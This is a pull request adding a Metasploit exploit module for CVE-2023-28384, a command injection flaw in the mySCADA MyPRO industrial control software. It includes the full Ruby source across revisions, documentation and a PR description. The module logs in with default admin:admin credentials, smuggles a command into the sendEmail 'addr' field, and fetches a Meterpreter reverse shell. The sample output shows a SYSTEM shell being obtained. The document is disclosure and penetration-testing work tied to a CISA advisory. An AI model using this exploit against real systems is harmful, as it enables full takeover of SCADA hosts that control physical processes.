### PR TITLE
mySCADA MyPRO Command Injection (CVE-2023-28384)

### DIFF
--- a/documentation/modules/exploit/windows/scada/mypro_cmdexe.md
+++ b/documentation/modules/exploit/windows/scada/mypro_cmdexe.md
@@ -52,19 +52,18 @@ Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fe
 msf6 exploit(windows/scada/mypro_cmdexe) > exploit
 
 [*] Started reverse TCP handler on 192.168.1.241:4444 
-[*] Checking MyPRO version...
-[+] Version retrieved: 8.28.0
-[+] Version is vulnerable.
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
 [*] Checking credentials...
 [+] Credentials are working.
 [*] Sending command injection...
-[*] Using randomly generated email address: UUuZCNFXIghJ@Lbruq.com
+[*] Using randomly generated email address: VfzbSXcISaX@fNavXU.com
 [*] Sending stage (201798 bytes) to 192.168.1.239
-[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.239:49303) at 2024-07-22 16:17:57 -0400
+[*] Meterpreter session 12 opened (192.168.1.241:4444 -> 192.168.1.239:57382) at 2024-07-23 23:38:12 -0400
 [*] Exploit finished, check thy shell.
 
 meterpreter > shell
-Process 9252 created.
+Process 2632 created.
 Channel 1 created.
 Microsoft Windows [Version 10.0.19045.4651]
 (c) Microsoft Corporation. All rights reserved.

--- a/documentation/modules/exploit/windows/scada/mypro_cmdexe.md
+++ b/documentation/modules/exploit/windows/scada/mypro_cmdexe.md
@@ -4,15 +4,20 @@
 
 This module exploits a command injection vulnerability in mySCADA MyPRO <= v8.28.0 (CVE-2023-28384).
 
-An authenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of `NT AUTHORITY\SYSTEM`.
+An authenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of
+`NT AUTHORITY\SYSTEM`.
 This module uses the default admin:admin credentials, but any account configured on the system can be used to exploit this issue.
 
-Versions <= 8.28.0 are affected. CISA published [ICSA-23-096-06](https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06) to cover the security issues. The official changelog for the updated version, v8.29.0, is available [here](https://web.archive.org/web/20230320130928/https://www.myscada.org/changelog/?section=version-8-29-0), although it only mentions a "General security improvement" without further details. 
+Versions <= 8.28.0 are affected. CISA published [ICSA-23-096-06](https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06) to cover
+the security issues. The official changelog for the updated version, v8.29.0, is available
+[here](https://web.archive.org/web/20230320130928/https://www.myscada.org/changelog/?section=version-8-29-0), although it only mentions a
+"General security improvement" without further details.
 
 **Vulnerable Application Installation**
 
 A trial version of the software can be obtained from [the vendor](http://nsa.myscada.org/myPRO/WIN/myPRO_x64_8.28.0.exe).
-For the product to work correctly, the project and log directories need to be configured first, which can be done through the web inteface (navigate to System > Storage).
+For the product to work correctly, the project and log directories need to be configured first, which can be done through the web inteface
+(navigate to System > Storage).
 
 **Successfully tested on**
 
@@ -36,17 +41,18 @@ msf6 exploit(windows/scada/mypro_cmdexe) > exploit
 You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.
 
 ## Options
-**USERNAME**
+### USERNAME
 
 The username of a MyPRO user (default: admin)
 
-**PASSWORD**
+### PASSWORD
 
 The associated password of the MyPRO user (default: admin)
 
 ## Scenarios
 
-Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the following:
+Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the
+following:
 
 ```
 msf6 exploit(windows/scada/mypro_cmdexe) > exploit

--- a/documentation/modules/exploit/windows/scada/mypro_cmdexe.md
+++ b/documentation/modules/exploit/windows/scada/mypro_cmdexe.md
@@ -1,0 +1,75 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a command injection vulnerability in mySCADA MyPRO <= v8.28.0 (CVE-2023-28384).
+
+An authenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of `NT AUTHORITY\SYSTEM`.
+This module uses the default admin:admin credentials, but any account configured on the system can be used to exploit this issue.
+
+Versions <= 8.28.0 are affected. CISA published [ICSA-23-096-06](https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06) to cover the security issues. The official changelog for the updated version, v8.29.0, is available [here](https://web.archive.org/web/20230320130928/https://www.myscada.org/changelog/?section=version-8-29-0), although it only mentions a "General security improvement" without further details. 
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor](http://nsa.myscada.org/myPRO/WIN/myPRO_x64_8.28.0.exe).
+For the product to work correctly, the project and log directories need to be configured first, which can be done through the web inteface (navigate to System > Storage).
+
+**Successfully tested on**
+
+- mySCADA MyPRO 8.28.0 on Windows 10 22H2
+- mySCADA MyPRO 8.27.0 on Windows 10 22H2
+- mySCADA MyPRO 8.26.0 on Windows 10 22H2
+
+## Verification Steps
+
+1. Install the application
+2. Configure the project and log paths (System > Storage in the web interface, running by default on TCP ports 80 & 443)
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/windows/scada/mypro_cmdexe
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/scada/mypro_cmdexe) > set RHOSTS <IP>
+msf6 exploit(windows/scada/mypro_cmdexe) > exploit
+```
+
+You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.
+
+## Options
+**USERNAME**
+
+The username of a MyPRO user (default: admin)
+
+**PASSWORD**
+
+The associated password of the MyPRO user (default: admin)
+
+## Scenarios
+
+Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the following:
+
+```
+msf6 exploit(windows/scada/mypro_cmdexe) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.241:4444 
+[*] Checking MyPRO version...
+[+] Version retrieved: 8.28.0
+[+] Version is vulnerable.
+[*] Checking credentials...
+[+] Credentials are working.
+[*] Sending command injection...
+[*] Using randomly generated email address: UUuZCNFXIghJ@Lbruq.com
+[*] Sending stage (201798 bytes) to 192.168.1.239
+[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.239:49303) at 2024-07-22 16:17:57 -0400
+[*] Exploit finished, check thy shell.
+
+meterpreter > shell
+Process 9252 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.19045.4651]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\WINDOWS\system32>whoami
+whoami
+nt authority\system
+```

--- a/documentation/modules/exploit/windows/scada/mypro_cmdexe.md
+++ b/documentation/modules/exploit/windows/scada/mypro_cmdexe.md
@@ -63,7 +63,6 @@ msf6 exploit(windows/scada/mypro_cmdexe) > exploit
 [*] Checking credentials...
 [+] Credentials are working.
 [*] Sending command injection...
-[*] Using randomly generated email address: VfzbSXcISaX@fNavXU.com
 [*] Sending stage (201798 bytes) to 192.168.1.239
 [*] Meterpreter session 12 opened (192.168.1.241:4444 -> 192.168.1.239:57382) at 2024-07-23 23:38:12 -0400
 [*] Exploit finished, check thy shell.

--- a/modules/exploits/windows/scada/mypro_cmdexe.rb
+++ b/modules/exploits/windows/scada/mypro_cmdexe.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2022-09-22',
         'Platform' => 'win',
-        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Arch' => [ ARCH_CMD ],
         'Targets' => [
           [
             'Windows_Fetch',

--- a/modules/exploits/windows/scada/mypro_cmdexe.rb
+++ b/modules/exploits/windows/scada/mypro_cmdexe.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+          'SideEffects' => [IOC_IN_LOGS]
         }
       )
     )
@@ -130,14 +130,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Send command injection
   def exec_mypro(cmd)
-    # Generating a random email address
-    addr = "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com"
-
-    print_status("Using randomly generated email address: #{addr}")
-
     post_data = {
       'type' => 'sendEmail',
-      'addr' => "addr\"&&#{cmd}"
+      'addr' => "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com\"&&#{cmd}"
     }
     post_json = JSON.generate(post_data)
 

--- a/modules/exploits/windows/scada/mypro_cmdexe.rb
+++ b/modules/exploits/windows/scada/mypro_cmdexe.rb
@@ -1,7 +1,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -60,6 +60,46 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  # Determine if the MyPRO instance runs a vulnerable version
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'l.fcgi'),
+        'vars_post' => {
+          't' => '98'
+        }
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      return CheckCode::Unknown
+    ensure
+      disconnect
+    end
+
+    if res && res.code == 200
+      regex = /\{.*\}/m
+      json_body = res.body[regex, 0]
+      data = JSON.parse(json_body)
+      version = data['V']
+      if version.nil?
+        return CheckCode::Unknown
+      else
+        vprint_status('Version retrieved: ' + version)
+      end
+
+      parts = version.split('.')
+      major = parts[0]
+      minor = parts[1]
+      if major.to_i == 8 && minor.to_i <= 28
+        return CheckCode::Appears
+      else
+        return CheckCode::Safe
+      end
+    else
+      return CheckCode::Unknown
+    end
+  end
+
   def exploit
     connect
     case target['Type']
@@ -68,53 +108,13 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def execute_command(cmd, _opts = {})
-    print_status('Checking MyPRO version...')
-    check_version
+  def execute_command(cmd)
     print_status('Checking credentials...')
     check_auth
     print_status('Sending command injection...')
     exec_mypro(cmd)
     print_status('Exploit finished, check thy shell.')
     handler
-  end
-
-  # Determine if the MyPRO instance runs a vulnerable version
-  def check_version
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'l.fcgi'),
-      'vars_post' => {
-        't' => '98'
-      }
-    })
-
-    unless res
-      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
-
-    end
-    if res && res.code == 200
-      regex = /\{.*\}/m
-      json_body = res.body[regex, 0]
-      data = JSON.parse(json_body)
-      version = data['V']
-      if version.nil?
-        fail_with(Failure::Unknown, 'Version missing from server response.')
-      else
-        print_good('Version retrieved: ' + version)
-      end
-
-      parts = version.split('.')
-      major = parts[0]
-      minor = parts[1]
-      if major.to_i == 8 && minor.to_i <= 28
-        print_good('Version is vulnerable.')
-      else
-        fail_with(Failure::NotVulnerable, 'Version is not vulnerable.')
-      end
-    else
-      fail_with(Failure::Unknown, 'Unexpected server response received.')
-    end
   end
 
   # Check if credentials are working

--- a/modules/exploits/windows/scada/mypro_cmdexe.rb
+++ b/modules/exploits/windows/scada/mypro_cmdexe.rb
@@ -1,0 +1,174 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)',
+        'Description' => %q{
+          Authenticated Command Injection in MyPRO <= v8.28.0 from mySCADA.
+          The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Michael Heinzl'], # Vulnerability discovery & MSF module
+        'References' => [
+          [ 'URL', 'https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06'],
+          [ 'CVE', '2023-28384']
+        ],
+        'DisclosureDate' => '2022-09-22',
+        'Platform' => 'win',
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          [
+            'Windows_Fetch',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => 'win',
+              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },
+              'Type' => :win_fetch
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new(
+          'USERNAME',
+          [ true, 'The username to authenticate with (default: admin)', 'admin' ]
+        ),
+        OptString.new(
+          'PASSWORD',
+          [ true, 'The password to authenticate with (default: admin)', 'admin' ]
+        ),
+        OptString.new(
+          'TARGETURI',
+          [ true, 'The URI for the MyPRO web interface', '/' ]
+        )
+      ]
+    )
+  end
+
+  def exploit
+    connect
+    case target['Type']
+    when :win_fetch
+      execute_command(payload.encoded)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status('Checking MyPRO version...')
+    check_version
+    print_status('Checking credentials...')
+    check_auth
+    print_status('Sending command injection...')
+    exec_mypro(cmd)
+    print_status('Exploit finished, check thy shell.')
+    handler
+  end
+
+  # Determine if the MyPRO instance runs a vulnerable version
+  def check_version
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'l.fcgi'),
+      'vars_post' => {
+        't' => '98'
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+
+    end
+    if res && res.code == 200
+      regex = /\{.*\}/m
+      json_body = res.body[regex, 0]
+      data = JSON.parse(json_body)
+      version = data['V']
+      if version.nil?
+        fail_with(Failure::Unknown, 'Version missing from server response.')
+      else
+        print_good('Version retrieved: ' + version)
+      end
+
+      parts = version.split('.')
+      major = parts[0]
+      minor = parts[1]
+      if major.to_i == 8 && minor.to_i <= 28
+        print_good('Version is vulnerable.')
+      else
+        fail_with(Failure::NotVulnerable, 'Version is not vulnerable.')
+      end
+    else
+      fail_with(Failure::Unknown, 'Unexpected server response received.')
+    end
+  end
+
+  # Check if credentials are working
+  def check_auth
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'sss2'),
+      'headers' => {
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    if res && res.code == 401
+      fail_with(Failure::NoAccess, 'Unauthorized access. Are your credentials correct?')
+    end
+    if res && res.code == 200
+      print_good('Credentials are working.')
+    end
+  end
+
+  # Send command injection
+  def exec_mypro(cmd)
+    # Generating a random email address
+    addr = "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com"
+
+    print_status("Using randomly generated email address: #{addr}")
+
+    post_data = {
+      'type' => 'sendEmail',
+      'addr' => 'addr' + '"&&' + cmd
+    }
+    post_json = JSON.generate(post_data)
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => post_json,
+      'uri' => normalize_uri(target_uri.path, 'sss2'),
+      'headers' => {
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      }
+
+    })
+
+    # unless res # We don't fail from this check because the server will wait until the injected command got executed before returning a response. Typically, this will simply result in a 504 Gateway Time-out error after some time, but there is no indication on whether the injected payload got successfully executed or not from the server response.
+    #   print_status("Failed to receive a reply from the server, probably waiting on injected command to finish. Check if you got a shell already.")
+    # end
+
+    if res && res.code == 200 # If the injected command executed and terminated within the timeout, a HTTP status code of 200 is returned.
+      print_good('Command successfully executed, check your shell.')
+    end
+  end
+
+end

--- a/modules/exploits/windows/scada/mypro_cmdexe.rb
+++ b/modules/exploits/windows/scada/mypro_cmdexe.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2022-09-22',
         'Platform' => 'win',
-        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Arch' => [ ARCH_CMD ],
         'Targets' => [
           [
             'Windows_Fetch',
@@ -72,14 +72,10 @@ class MetasploitModule < Msf::Exploit::Remote
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
       return CheckCode::Unknown
-    ensure
-      disconnect
     end
 
     if res && res.code == 200
-      regex = /\{.*\}/m
-      json_body = res.body[regex, 0]
-      data = JSON.parse(json_body)
+      data = res.get_json_document
       version = data['V']
       if version.nil?
         return CheckCode::Unknown
@@ -87,10 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
         vprint_status('Version retrieved: ' + version)
       end
 
-      parts = version.split('.')
-      major = parts[0]
-      minor = parts[1]
-      if major.to_i == 8 && minor.to_i <= 28
+      if Rex::Version.new(version) <= Rex::Version.new('8.28')
         return CheckCode::Appears
       else
         return CheckCode::Safe
@@ -101,11 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    connect
-    case target['Type']
-    when :win_fetch
-      execute_command(payload.encoded)
-    end
+    execute_command(payload.encoded)
   end
 
   def execute_command(cmd)
@@ -114,7 +103,6 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Sending command injection...')
     exec_mypro(cmd)
     print_status('Exploit finished, check thy shell.')
-    handler
   end
 
   # Check if credentials are working
@@ -130,11 +118,13 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res
       fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
     end
-    if res && res.code == 401
-      fail_with(Failure::NoAccess, 'Unauthorized access. Are your credentials correct?')
-    end
-    if res && res.code == 200
+    case res.code
+    when 200
       print_good('Credentials are working.')
+    when 401
+      fail_with(Failure::NoAccess, 'Unauthorized access. Are your credentials correct?')
+    else
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
     end
   end
 
@@ -147,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     post_data = {
       'type' => 'sendEmail',
-      'addr' => 'addr' + '"&&' + cmd
+      'addr' => "addr\"&&#{cmd}"
     }
     post_json = JSON.generate(post_data)
 
@@ -162,9 +152,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     })
 
-    # unless res # We don't fail from this check because the server will wait until the injected command got executed before returning a response. Typically, this will simply result in a 504 Gateway Time-out error after some time, but there is no indication on whether the injected payload got successfully executed or not from the server response.
-    #   print_status("Failed to receive a reply from the server, probably waiting on injected command to finish. Check if you got a shell already.")
-    # end
+    # We don't fail if no response is received, as the server will wait until the injected command got executed before returning a response. Typically, this will simply result in a 504 Gateway Time-out error after some time, but there is no indication on whether the injected payload got successfully executed or not from the server response.
 
     if res && res.code == 200 # If the injected command executed and terminated within the timeout, a HTTP status code of 200 is returned.
       print_good('Command successfully executed, check your shell.')


### PR DESCRIPTION
This is a new module which exploits an authenticated command injection vulnerability in mySCADA MyPRO <= v8.28.0 (CVE-2023-28384). 

Successful exploitation allows to inject arbitrary OS commands which will get executed in the context of `NT AUTHORITY\SYSTEM`.

## Verification Steps

1. Install the application from the [vendor](http://nsa.myscada.org/myPRO/WIN/myPRO_x64_8.28.0.exe).
2. Configure any path for the project and log directories (System > Storage in the web interface, listening by default on TCP ports 80 & 443 on all network interfaces), and restart the system.
3. Run Metasploit:
- [ ] Start `msfconsole` and enter the following commands
- [ ] `use exploit/windows/scada/mypro_cmdexe`
- [ ] `set RHOSTS <IP>` (e.g., `set RHOSTS 192.168.1.239`)
- [ ] `exploit`

This should result in a meterpreter session:
```
msf6 exploit(windows/scada/mypro_cmdexe) > exploit 

[*] Started reverse TCP handler on 192.168.1.241:4444 
[*] Checking MyPRO version...
[+] Version retrieved: 8.28.0
[+] Version is vulnerable.
[*] Checking credentials...
[+] Credentials are working.
[*] Sending command injection...
[*] Using randomly generated email address: cXt0D0Mw3@Q00D.com
[*] Sending stage (201798 bytes) to 192.168.1.239
[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.239:54181) at 2024-07-22 16:58:50 -0400
[*] Exploit finished, check thy shell.

meterpreter > shell
Process 7468 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4651]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system
```

By default, the module uses the product's default credentials, which are `admin:admin`, but any other user that has been configured on the system can be specified via the `set USERNAME` and `set PASSWORD` options to exploit this issue.

**Successfully tested on**

Tested in the following deployments, with both the `curl` and `certutil` fetch commands.
- mySCADA MyPRO 8.28.0 on Windows 10 22H2
- mySCADA MyPRO 8.27.0 on Windows 10 22H2
- mySCADA MyPRO 8.26.0 on Windows 10 22H2
